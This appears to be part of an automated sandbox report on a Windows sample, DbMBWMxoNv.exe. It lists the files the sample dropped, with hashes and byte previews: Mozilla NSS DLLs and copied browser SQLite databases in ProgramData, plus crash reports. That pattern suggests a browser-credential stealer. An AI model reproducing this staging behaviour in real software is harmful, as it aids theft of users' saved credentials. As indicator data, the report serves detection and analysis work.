SHA-256:	21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
SHA-512:	012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\DHCGIDHDAKJECBFHCBAAKJKFCG

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03786218306281921
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWB2IGKhNbxrO3Dpvu2HI:58r54w0VW3xWB2ohFQ3Y2
MD5:	4BB4A37B8E93E9B0F5D3DF275799D45E
SHA1:	E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7
SHA-256:	89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
SHA-512:	F2FC9067EF11DC3B719507B97C76A19B9E976D143A2FD11474B8D2A2848A706AFCA316A95FEEBA644099497A95E1C426CDAB923D5A70619018E1543FEF3182DB
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EHCFBFBA

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FBGHIIJDGHCBFIECBKEGHDHDBA

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCAEHJJK

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2654201644094927
Encrypted:	false
SSDEEP:	384:KrJ/2qOB1nxCkMGSAELyKOMq+8HKkjucswRv8p3nVumti:K0q+n0JG9ELyKOMq+8HKkjuczRv89hi
MD5:	792E1A34DABC438C2E17357CABC97201
SHA1:	C0B26DAA4C1055EC080AA2224A8FA62C87269242
SHA-256:	7544F36D11A9E6177E5FCC190AFF6BA3CF62D12D852116D02A0000A03F3794EB
SHA-512:	368109DA7CAF12B4B4EF2BAB789868A8FB21F9D037D75E0FB025F3EAD5C11D41854A9A8816B2022CE6118342BDDF11D727EE00633D1C0B33CBD428525E08234F
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_DbMBWMxoNv.exe_e28a7f3fdd553095b7e9f421f150b193afbb78f1_49e9d94c_cda925a0-01bb-4bf2-af19-a4feacb1df2c\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1702950199574458
Encrypted:	false
SSDEEP:	192:d1oJESd0kBJwLjsqZrP2MaVXzuiFIZ24IO8yy:Ho6SekBJSjlktzuiFIY4IO8y
MD5:	9DBFA079D82E4BC4C8565A9B33F44B22
SHA1:	2135D5593132E3E1FF1D13899B089513EEDF2511
SHA-256:	4A527215F603D9E8D25685837DADB5A82B6B5B25B30F28C6F6175AACD0908BEA
SHA-512:	AB0DF09A6856F4A0482AD18070080AEF759E022657CD2C8ECD679BDE749D44BC275D4EBAFDC91BCB0239D4737F99A07A29270954224C6468D2397FA2000FAB0B
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.0.4.7.1.4.8.8.0.6.4.1.4.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.0.4.7.1.4.9.9.8.7.2.6.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.d.a.9.2.5.a.0.-.0.1.b.b.-.4.b.f.2.-.a.f.1.9.-.a.4.f.e.a.c.b.1.d.f.2.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.6.c.0.d.0.7.-.4.f.4.c.-.4.c.c.c.-.8.8.2.f.-.b.0.7.9.e.2.5.8.1.4.a.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.D.b.M.B.W.M.x.o.N.v...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.3.8.-.0.0.0.1.-.0.0.1.4.-.1.7.2.d.-.8.f.1.f.4.8.2.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.0.6.7.7.1.3.c.4.2.d.0.9.5.8.a.6.d.b.3.6.a.0.3.f.5.3.a.4.c.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.2.3.a.b.d.6.3.3.a.4.6.0.1.1.c.0.2.a.2.7.f.9.d.7.3.f.4.a.5.a.f.1.7.2.3.9.6.d.7.f.!.D.b.M.B.W.M.x.o.N.v...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6AF1.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Nov 2 18:52:29 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	59540
Entropy (8bit):	2.5375894130821837
Encrypted:	false
SSDEEP:	384:37ayQSxLy4sgEQSrO+F63dx3Cza1KX9h:37tQmLy4sgEmxyZX9
MD5:	CBA9FE52291BBD59E63817489FB972FD
SHA1:	B6E7B79F577605E35BCA21C58FA7B697193658AF
SHA-256:	B9A369ED170DC3B2459F2E9C1978E8CA977A51A60EC6CF257109D1F8129E86D4
SHA-512:	F1F16E9AAC100D97B2279D4A276D09A7CA902A0D56CD3E6000CE3B1CE5E153011FF35DDD2F2BEDF21BCF953417E937376674D967EC7B265136EFE1CA66737C64
Malicious:	false
Preview:	MDMP..a..... ........t&g............4............"..<............;..........T.......8...........T........... c..t............)...........+..............................................................................eJ......\,......GenuineIntel............T.......8....Y&g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E2E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8354
Entropy (8bit):	3.7040597225171017
Encrypted:	false
SSDEEP:	192:R6l7wVeJU565dk6YN4SU954gmfP4epDH89bZLsfgTm:R6lXJi6jk6YCSU954gmfPeZQf5
MD5:	627F86BA967824F5FF64EF597866A36F
SHA1:	DEF54C4F0E1F9450BCEEB58BD9313A934DB6A87F
SHA-256:	647382AE6691164EAC8AD1B6E06830E0A68C5A22828DB8940B95780B4F50074C
SHA-512:	22C174237C3E9DEA212FACF34353CB1240C57CE4CBD7B4ED2ADEC574DFEF2C2ECF99534D64711CB2748DD50415EEDD6C60D84A360723E545A5EDB87A5AC2AFBB
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.5.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6EBC.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4579
Entropy (8bit):	4.478969604977602
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg77aI9HkWpW8VYVvYm8M4JuKFvye+q8Ad0TYm2d:uIjfEI7h97V+yJmeT0T12d
MD5:	57829359039B1E3BF07D4F8015F3EAF9
SHA1:	AEC5211139A2C814EB3BB64EBC3EB0D521EEB7E8
SHA-256:	1239A429ED6ECC54339C072F7ABBA464B260CFA757D8743D8CC93E94299084A7
SHA-512:	02E6373B4D71D2F80430DEEFBAA0CF4E1BD6B77492E8EE79CD8D4497A4C34B6A4D6575718FD16447D63E5E8FC2BDCDE436D300F6181C088F62D4079FE0E6A257
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="570835" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\chrome.dll

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	692736
Entropy (8bit):	6.304379785339226
Encrypted:	false
SSDEEP:	12288:Kk5nGNLFzxC+gej5yNcTN+pt+tLK75PL2rn65hYVKKuKOvy/j3t:KMGNL/geFyNcTN+jv75TQn652VBuNyb
MD5:	EDA18948A989176F4EEBB175CE806255
SHA1:	FF22A3D5F5FB705137F233C36622C79EAB995897
SHA-256:	81A4F37C5495800B7CC46AEA6535D9180DADB5C151DB6F1FD1968D1CD8C1EEB4
SHA-512:	160ED9990C37A4753FC0F5111C94414568654AFBEDC05308308197DF2A99594F2D5D8FE511FD2279543A869ED20248E603D88A0B9B8FB119E8E6131B0C52FF85
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s,.>7M.m7M.m7M.m\|5.l<M.m\|5.l.M.m\|5.l#M.m'..l"M.m'..l'M.m'..l.M.m\|5.l:M.m7M.m.M.m7M.mlM.m...l6M.m...l6M.mRich7M.m........................PE..L......g.........."!...)............P.....................................................@..........................\..l...<].................................. 8...(..T....................(......@'..@............................................text............................... ..`.rdata..zV.......X..................@..@.data...T....p.......N..............@....reloc.. 8.......:...X..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: czxw4iVMHJ.exe, Detection: malicious, Browse Filename: JHPvqMzKbz.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RoamingEBFBKKJECA.exe.log

Download File

Process:	C:\Users\user\AppData\RoamingEBFBKKJECA.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1687
Entropy (8bit):	5.338930762014548
Encrypted:	false
SSDEEP:	48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeR:iqlYqh3ou0aymsqwtI6eqzm
MD5:	15E04367C03184DCF6E0D75C17713029
SHA1:	ED1BF186345A11D8B4741F52B9DDCCE8702C8A12
SHA-256:	C10A3B6F0C9F3DA0C85A63F296C3E027E486BC174FFDDA6371B00AE605799D76
SHA-512:	EE9ADFDF176D8171AFB95920C265CBE5AC652D34990CF924E491C06337929BBDBF9EEEADE96EFB7943D07C25D66D634F49FD9C2B4CFFE072747FAD7E40ED4618
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1c42071b-9513-4772-bb62-3be321a7ef46.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	59249
Entropy (8bit):	6.100349141567351
Encrypted:	false
SSDEEP:	1536:hMk1rT8HnaoMPGWv/sxtwuUoEzuTFow7VLyMV/Yosr:hMYrT8Hav/4KJo9hVVeZosr
MD5:	3BBEFF2E9DEC3CB1A6E30D4ABBA71D54
SHA1:	3ADCE84C3AC88F28457158BB0B8923359CB1D4DA
SHA-256:	DE9B0E4E1C2FDFD858529B710CEE513CD94B82533ED7BE41C2607099FC580128
SHA-512:	AF1ADED4565E2541EC7FF5234CFDA83C41E09B897551522B6B5AC64ED650351748961301E3D4068695CF5B6574BDAD900AD3ABB7D2BC047E9526CBFD69238DE6
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"23c6e320-8de9-4f8d-a3f0-2270130e633b"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2d951fa7-940a-4928-9748-a53c4deee819.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	59249
Entropy (8bit):	6.100323075523944
Encrypted:	false
SSDEEP:	1536:hMk1rT8Hna/PGWv/sxtwuUoEzuTFow7VLyMV/Yosr:hMYrT8HMv/4KJo9hVVeZosr
MD5:	D2E14FDF43939A8868E48AAEED62F1C4
SHA1:	4DEC57C5E081C013744EB2717F88147ADD9F748F
